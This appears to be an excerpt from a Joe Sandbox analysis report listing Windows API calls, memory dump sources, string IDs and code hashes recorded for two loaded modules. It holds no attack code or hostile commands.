                                                                                                                                                                                                                                                                          • GetModuleHandleW.KERNEL32(00000000,00000080,00000001,Close,50000001,?,00000128,00000025,00000032,0000000E,00000082,000001F5,00000000,50000000,?,00000026), ref: 6A56A1FB
                                                                                                                                                                                                                                                                          • DialogBoxIndirectParamW.USER32(00000000,00000000,?,6A56A280,6A5695D0,00000000), ref: 6A56A24A
                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000014.00000002.2490673887.000000006A521000.00000020.00000001.01000000.0000001E.sdmp, Offset: 6A520000, based on PE: true
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2490646532.000000006A520000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2490733233.000000006A5A1000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2490766295.000000006A5CC000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2490815908.000000006A5D8000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_20_2_6a520000_a1.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: DialogHandleIndirectModuleParam
                                                                                                                                                                                                                                                                          • String ID: Close$Copy$Details >>$Send Error Report
                                                                                                                                                                                                                                                                          • API String ID: 279259766-113472931
                                                                                                                                                                                                                                                                          • Opcode ID: e31a0d2546670da71902f9db200f573d53afdffb2f3f43c574627807c92cc740
                                                                                                                                                                                                                                                                          • Instruction ID: 2c81a3e0156059ab50594b2d535ddc4b7e24d0a14af8c22fa303142d2de9e9e5
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: e31a0d2546670da71902f9db200f573d53afdffb2f3f43c574627807c92cc740
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: A2A18B70A40215AFEB15CF64CC55BAEB7B5FF48705F014229FA12BB2D0EBB1A901CB90
                                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                          • GetModuleHandleW.KERNEL32(00000000,00000080,00000001,Close,50000001,?,00000128,?,00000032,0000000E,00000082,000001F5,?,50000000,?,00000026), ref: 002C082B
                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000014.00000002.2487719493.00000000001B1000.00000020.00000001.01000000.0000001A.sdmp, Offset: 001B0000, based on PE: true
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2487690324.00000000001B0000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2487913830.00000000003CC000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2487992773.0000000000453000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2488012045.0000000000458000.00000008.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2488035341.0000000000459000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2488056393.000000000045C000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_20_2_1b0000_a1.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: HandleModule
                                                                                                                                                                                                                                                                          • String ID: Close$Copy$Details >>$Send Error Report$`>
                                                                                                                                                                                                                                                                          • API String ID: 4139908857-2853602678
                                                                                                                                                                                                                                                                          • Opcode ID: 9dce009e0d2d6a62f756cec93986981c4437b7624d2029640a207afca1a42f15
                                                                                                                                                                                                                                                                          • Instruction ID: 7846802a7e4fa00407eae7c46aca591b5a77686e9431ff7db2cb66d633336bd4
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 9dce009e0d2d6a62f756cec93986981c4437b7624d2029640a207afca1a42f15
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: ACA17B70A50255EBEB19DF50CC52FAEB7A5AF48744F10422DF601BB2C1EBB0A915CB90
                                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                          • EnterCriticalSection.KERNEL32(0045B428,DF534560,00000000,0045B444), ref: 001C6F43
                                                                                                                                                                                                                                                                          • LeaveCriticalSection.KERNEL32(0045B428), ref: 001C6FA8
                                                                                                                                                                                                                                                                          • LeaveCriticalSection.KERNEL32(0045B428), ref: 001C709B
                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000014.00000002.2487719493.00000000001B1000.00000020.00000001.01000000.0000001A.sdmp, Offset: 001B0000, based on PE: true
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2487690324.00000000001B0000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2487913830.00000000003CC000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2487992773.0000000000453000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2488012045.0000000000458000.00000008.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2488035341.0000000000459000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2488056393.000000000045C000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_20_2_1b0000_a1.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: CriticalSection$Leave$Enter
                                                                                                                                                                                                                                                                          • String ID: v$&^4$0^4$ATL:%p
                                                                                                                                                                                                                                                                          • API String ID: 2978645861-3831979984
                                                                                                                                                                                                                                                                          • Opcode ID: fa579e29ad799c3c3139565af9ef826098cf1370a22250f42ed9a9364705fec5
                                                                                                                                                                                                                                                                          • Instruction ID: dca541eb4966cca3af29c97a09da1bde9a999655b78105d3a88533437671f39a
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: fa579e29ad799c3c3139565af9ef826098cf1370a22250f42ed9a9364705fec5
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: C2517971904B449BDB21CF68C941BAAF7F4FF59711F00461DE896A3691E770B984CBA0
                                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                          • _ValidateLocalCookies.LIBCMT ref: 6A56E2F7
                                                                                                                                                                                                                                                                          • ___except_validate_context_record.LIBVCRUNTIME ref: 6A56E2FF
                                                                                                                                                                                                                                                                          • _ValidateLocalCookies.LIBCMT ref: 6A56E388
                                                                                                                                                                                                                                                                          • __IsNonwritableInCurrentImage.LIBCMT ref: 6A56E3B3
                                                                                                                                                                                                                                                                          • _ValidateLocalCookies.LIBCMT ref: 6A56E408
                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000014.00000002.2490673887.000000006A521000.00000020.00000001.01000000.0000001E.sdmp, Offset: 6A520000, based on PE: true
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2490646532.000000006A520000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2490733233.000000006A5A1000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2490766295.000000006A5CC000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2490815908.000000006A5D8000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_20_2_6a520000_a1.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
                                                                                                                                                                                                                                                                          • String ID: csm
                                                                                                                                                                                                                                                                          • API String ID: 1170836740-1018135373
                                                                                                                                                                                                                                                                          • Opcode ID: db8306013278fa9b990fb0b51a8f91e7a7f5cbd99352edc223bfb23906e3a7e2
                                                                                                                                                                                                                                                                          • Instruction ID: 8e74f1451b777736566204db710e49edfbc3aeb2895d140153104e0571b02c69
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: db8306013278fa9b990fb0b51a8f91e7a7f5cbd99352edc223bfb23906e3a7e2
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: B541C334A01209AFCF00CF68DC94A9EBBB5BF46318F158155ED24AB362DB31E916CB91
                                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                            • Part of subcall function 6A547E10: GetProcessHeap.KERNEL32 ref: 6A547E6C
                                                                                                                                                                                                                                                                          • #17.MSI(00000002,?,00000000,?,AA831995), ref: 6A5472C2
                                                                                                                                                                                                                                                                          • #125.MSI(00000000,00000000,[1],?,AA831995), ref: 6A5472D9
                                                                                                                                                                                                                                                                          • #125.MSI(00000000,00000001,AA831995,?,AA831995), ref: 6A5472E6
                                                                                                                                                                                                                                                                          • #103.MSI(00000000,04000000,00000000,?,AA831995), ref: 6A5472F8
                                                                                                                                                                                                                                                                          • #8.MSI(00000000,?,AA831995), ref: 6A547307
                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000014.00000002.2490673887.000000006A521000.00000020.00000001.01000000.0000001E.sdmp, Offset: 6A520000, based on PE: true
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2490646532.000000006A520000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2490733233.000000006A5A1000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2490766295.000000006A5CC000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2490815908.000000006A5D8000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_20_2_6a520000_a1.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: #125$#103HeapProcess
                                                                                                                                                                                                                                                                          • String ID: [1]
                                                                                                                                                                                                                                                                          • API String ID: 2208923955-1278161592
                                                                                                                                                                                                                                                                          • Opcode ID: e133660900b5e11a0c96eb7fa80ddfb1f56823d25d433a9ecb2aa66bcd09b528
                                                                                                                                                                                                                                                                          • Instruction ID: 8ec518fe210cda5f83ab0e56e5944651403ecf6530cd48cf766380ff4d42a24d
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: e133660900b5e11a0c96eb7fa80ddfb1f56823d25d433a9ecb2aa66bcd09b528
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 88417C71A016459FDB01DFA9C888B9EBBF8FF05324F118659F922E7291DB74A900CB50
                                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                          • Wow64DisableWow64FsRedirection.KERNEL32(00000000,DF534560,?,?), ref: 002B7607
                                                                                                                                                                                                                                                                          • CreateProcessW.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,DF534560,003AEF1D), ref: 002B767F
                                                                                                                                                                                                                                                                          • GetLastError.KERNEL32 ref: 002B7690
                                                                                                                                                                                                                                                                          • WaitForSingleObject.KERNEL32(003AEF1D,000000FF), ref: 002B76AC
                                                                                                                                                                                                                                                                          • GetExitCodeProcess.KERNEL32(003AEF1D,00000000), ref: 002B76BD
                                                                                                                                                                                                                                                                          • CloseHandle.KERNEL32(003AEF1D), ref: 002B76C7
                                                                                                                                                                                                                                                                          • Wow64RevertWow64FsRedirection.KERNEL32(00000000), ref: 002B76E2
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000014.00000002.2487719493.00000000001B1000.00000020.00000001.01000000.0000001A.sdmp, Offset: 001B0000, based on PE: true
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2487690324.00000000001B0000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2487913830.00000000003CC000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2487992773.0000000000453000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2488012045.0000000000458000.00000008.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2488035341.0000000000459000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2488056393.000000000045C000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_20_2_1b0000_a1.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: Wow64$ProcessRedirection$CloseCodeCreateDisableErrorExitHandleLastObjectRevertSingleWait
                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                          • API String ID: 1153077990-0
                                                                                                                                                                                                                                                                          • Opcode ID: a1fd8d59a7ff8aac553462c1f1265bbc4ad3f9dc38db323a5a19496697a7539c
                                                                                                                                                                                                                                                                          • Instruction ID: b9cd9072e328c4ba60c40631c3d3931efb514faaa57bf7f0bd73bad0923aded7
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: a1fd8d59a7ff8aac553462c1f1265bbc4ad3f9dc38db323a5a19496697a7539c
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 7A418E71E14789ABDB11CFA9CD04BEEBBF8AF89300F145659E825E7190D7749A40CF60
                                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                          • EnterCriticalSection.KERNEL32(DF534560,DF534560), ref: 00219980
                                                                                                                                                                                                                                                                          • GetCurrentThreadId.KERNEL32 ref: 00219993
                                                                                                                                                                                                                                                                          • LeaveCriticalSection.KERNEL32(?), ref: 00219A11
                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000014.00000002.2487719493.00000000001B1000.00000020.00000001.01000000.0000001A.sdmp, Offset: 001B0000, based on PE: true
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2487690324.00000000001B0000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2487913830.00000000003CC000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2487992773.0000000000453000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2488012045.0000000000458000.00000008.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2488035341.0000000000459000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2488056393.000000000045C000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_20_2_1b0000_a1.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: CriticalSection$CurrentEnterLeaveThread
                                                                                                                                                                                                                                                                          • String ID: >$ >$ v
                                                                                                                                                                                                                                                                          • API String ID: 2351996187-2080287267
                                                                                                                                                                                                                                                                          • Opcode ID: a899a9b28be823f5755d3c6adfd66a82a180192f08229125478742c2ba03797b
                                                                                                                                                                                                                                                                          • Instruction ID: b057aee1e4f27704f3871177930c5c4978b33bae9fe8c46c1ee6ef1f38879611
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: a899a9b28be823f5755d3c6adfd66a82a180192f08229125478742c2ba03797b
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 7231C971900345DFDB12CF68D905BAEBBF4EF09304F144169E996E33A1E375AA40CB90
                                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                          • LoadLibraryW.KERNEL32(Shlwapi.dll,?,00000000,?,00000001,002CA241,00000001,DF534560,?,00000000,00000001), ref: 002BF54B
                                                                                                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,DllGetVersion), ref: 002BF561
                                                                                                                                                                                                                                                                          • FreeLibrary.KERNEL32(00000000), ref: 002BF59A
                                                                                                                                                                                                                                                                          • FreeLibrary.KERNEL32(00000000,?,00000000,?,00000001,002CA241,00000001,DF534560,?,00000000,00000001), ref: 002BF5B6
                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000014.00000002.2487719493.00000000001B1000.00000020.00000001.01000000.0000001A.sdmp, Offset: 001B0000, based on PE: true
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2487690324.00000000001B0000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2487913830.00000000003CC000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2487992773.0000000000453000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2488012045.0000000000458000.00000008.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2488035341.0000000000459000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2488056393.000000000045C000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_20_2_1b0000_a1.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: Library$Free$AddressLoadProc
                                                                                                                                                                                                                                                                          • String ID: DllGetVersion$Shlwapi.dll
                                                                                                                                                                                                                                                                          • API String ID: 1386263645-2240825258
                                                                                                                                                                                                                                                                          • Opcode ID: 50b72f905b04b5af0e7f9df4c1b2f33f3c8af5f23f2463e061442f4b6689cb04
                                                                                                                                                                                                                                                                          • Instruction ID: 7d8423d9e587e4ac50c663ef503531951b38c4423e73743ecbbbd875768b5598
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 50b72f905b04b5af0e7f9df4c1b2f33f3c8af5f23f2463e061442f4b6689cb04
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 8B21D4766143028BD711EF29ED81A6BB3E8BFDD745F80052EF449C7241EB31E8058BA2
                                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                          • __EH_prolog3.LIBCMT ref: 6A56BE10
                                                                                                                                                                                                                                                                          • std::_Lockit::_Lockit.LIBCPMT ref: 6A56BE1A
                                                                                                                                                                                                                                                                            • Part of subcall function 6A55AEB0: std::_Lockit::_Lockit.LIBCPMT ref: 6A55AEE0
                                                                                                                                                                                                                                                                            • Part of subcall function 6A55AEB0: std::_Lockit::~_Lockit.LIBCPMT ref: 6A55AF08
                                                                                                                                                                                                                                                                          • codecvt.LIBCPMT ref: 6A56BE54
                                                                                                                                                                                                                                                                          • std::_Facet_Register.LIBCPMT ref: 6A56BE6B
                                                                                                                                                                                                                                                                          • std::_Lockit::~_Lockit.LIBCPMT ref: 6A56BE8B
                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000014.00000002.2490673887.000000006A521000.00000020.00000001.01000000.0000001E.sdmp, Offset: 6A520000, based on PE: true
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2490646532.000000006A520000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2490733233.000000006A5A1000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2490766295.000000006A5CC000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2490815908.000000006A5D8000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_20_2_6a520000_a1.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Registercodecvt
                                                                                                                                                                                                                                                                          • String ID: dd]j
                                                                                                                                                                                                                                                                          • API String ID: 712880209-2024568811
                                                                                                                                                                                                                                                                          • Opcode ID: 95760c86a71de8d0a5de8ae76c97672341ea52795221af952df8de898a8e22b5
                                                                                                                                                                                                                                                                          • Instruction ID: 64bf1c1da70b4be4a663e1346cec1248a46ffdf62fd56d01978e041277f1a6b3
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 95760c86a71de8d0a5de8ae76c97672341ea52795221af952df8de898a8e22b5
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 9A21CC36940214ABCB02EF94C8486AEB7F5BF85324F17451AF915AB392DF709D05C791
                                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                          • FreeLibrary.KERNEL32(00000000,?,6A57EC64,6A54E46D,6A55FCBC,00000001,00000000,6A54E46B,?,6A57EE31,00000021,FlsSetValue,6A5A52F0,6A5A52F8,00000001), ref: 6A57EC18
                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000014.00000002.2490673887.000000006A521000.00000020.00000001.01000000.0000001E.sdmp, Offset: 6A520000, based on PE: true
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2490646532.000000006A520000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2490733233.000000006A5A1000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2490766295.000000006A5CC000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2490815908.000000006A5D8000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_20_2_6a520000_a1.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: FreeLibrary
                                                                                                                                                                                                                                                                          • String ID: api-ms-$ext-ms-
                                                                                                                                                                                                                                                                          • API String ID: 3664257935-537541572
                                                                                                                                                                                                                                                                          • Opcode ID: 528f7b7100667e8ffab8098b47c46cf8cdde94ce44e6d52bde42a8c5fc66cd4f
                                                                                                                                                                                                                                                                          • Instruction ID: 10ad870b9bac9a025db9ca113f309ef6971fa0d1ea6d70aa2968ce2b366befc9
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 528f7b7100667e8ffab8098b47c46cf8cdde94ce44e6d52bde42a8c5fc66cd4f
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: E8216375A05311ABD732DA65DC44A8E3BA8AF437A4F124511EE56F7281DF30EE00CAE1
                                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                          • __Init_thread_footer.LIBCMT ref: 00296A00
                                                                                                                                                                                                                                                                            • Part of subcall function 003497F8: EnterCriticalSection.KERNEL32(00459EA0,?,?,001B9F37,0045AAD4,003CA720), ref: 00349802
                                                                                                                                                                                                                                                                            • Part of subcall function 003497F8: LeaveCriticalSection.KERNEL32(00459EA0,?,001B9F37,0045AAD4,003CA720), ref: 00349835
                                                                                                                                                                                                                                                                            • Part of subcall function 003497F8: RtlWakeAllConditionVariable.NTDLL ref: 003498AC
                                                                                                                                                                                                                                                                          • GetProcAddress.KERNEL32(SetWindowTheme), ref: 00296A3D
                                                                                                                                                                                                                                                                          • __Init_thread_footer.LIBCMT ref: 00296A54
                                                                                                                                                                                                                                                                            • Part of subcall function 00349842: EnterCriticalSection.KERNEL32(00459EA0,-00000010,?,?,001B9EC6,0045AAD4,DF534560,?,?,0037191D,000000FF,?,001BCB1F,DF534560,-00000010,?), ref: 0034984D
                                                                                                                                                                                                                                                                            • Part of subcall function 00349842: LeaveCriticalSection.KERNEL32(00459EA0,?,001B9EC6,0045AAD4,DF534560,?,?,0037191D,000000FF,?,001BCB1F,DF534560,-00000010,?,?,00000008), ref: 0034988A
                                                                                                                                                                                                                                                                            • Part of subcall function 00276110: GetSystemDirectoryW.KERNEL32(?,00000105), ref: 00276151
                                                                                                                                                                                                                                                                            • Part of subcall function 00276110: _wcschr.LIBVCRUNTIME ref: 0027620F
                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000014.00000002.2487719493.00000000001B1000.00000020.00000001.01000000.0000001A.sdmp, Offset: 001B0000, based on PE: true
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2487690324.00000000001B0000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2487913830.00000000003CC000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2487992773.0000000000453000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2488012045.0000000000458000.00000008.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2488035341.0000000000459000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2488056393.000000000045C000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_20_2_1b0000_a1.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: CriticalSection$EnterInit_thread_footerLeave$AddressConditionDirectoryProcSystemVariableWake_wcschr
                                                                                                                                                                                                                                                                          • String ID: SetWindowTheme$UxTheme.dll$explorer
                                                                                                                                                                                                                                                                          • API String ID: 3020813744-3123591815
                                                                                                                                                                                                                                                                          • Opcode ID: 97f880ca943fe43be6a8a6dc1b876d72fbedc8f2cc76fef06bab61a52656456f
                                                                                                                                                                                                                                                                          • Instruction ID: d8cd7be9a500774702aa9a03683643e2be565889807529527967bc0ae39e537e
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 97f880ca943fe43be6a8a6dc1b876d72fbedc8f2cc76fef06bab61a52656456f
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 9A212771A00341EBCB22CF18DC46B9977E4EB49B22F104236F821AB3D2D775E9108BD8
                                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                          • FreeLibrary.KERNEL32(00000000,?,003632B2,?,?,?,00000000,00000000,?,0036351C,00000021,FlsSetValue,003D104C,003D1054,?), ref: 00363266
                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                          Memory Dump Source
